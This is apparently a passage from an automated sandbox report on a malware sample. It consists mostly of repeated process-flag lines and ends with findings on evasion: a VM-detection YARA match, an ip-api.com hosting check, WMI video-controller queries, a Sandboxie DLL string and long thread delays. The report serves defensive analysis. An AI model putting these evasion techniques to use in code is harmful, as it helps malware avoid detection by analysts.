          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 8168, type: MEMORYSTR
          Check if machine is in data center or colocation facility
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 1650000 memory reserve | memory write watch
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2FE0000 memory reserve | memory write watch
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 4FE0000 memory reserve | memory write watch
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599718
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599593
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599465
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599355
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599249
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599140
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599031
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598921
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598810
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598699
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598593
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598484
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598374
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598265
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598149
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598039
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597922
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597812
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597695
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597578
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597372
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597265
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597155
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597044
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596937
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596827
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596716
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596609
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596499
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596389
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596281
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596053
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595922
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595797
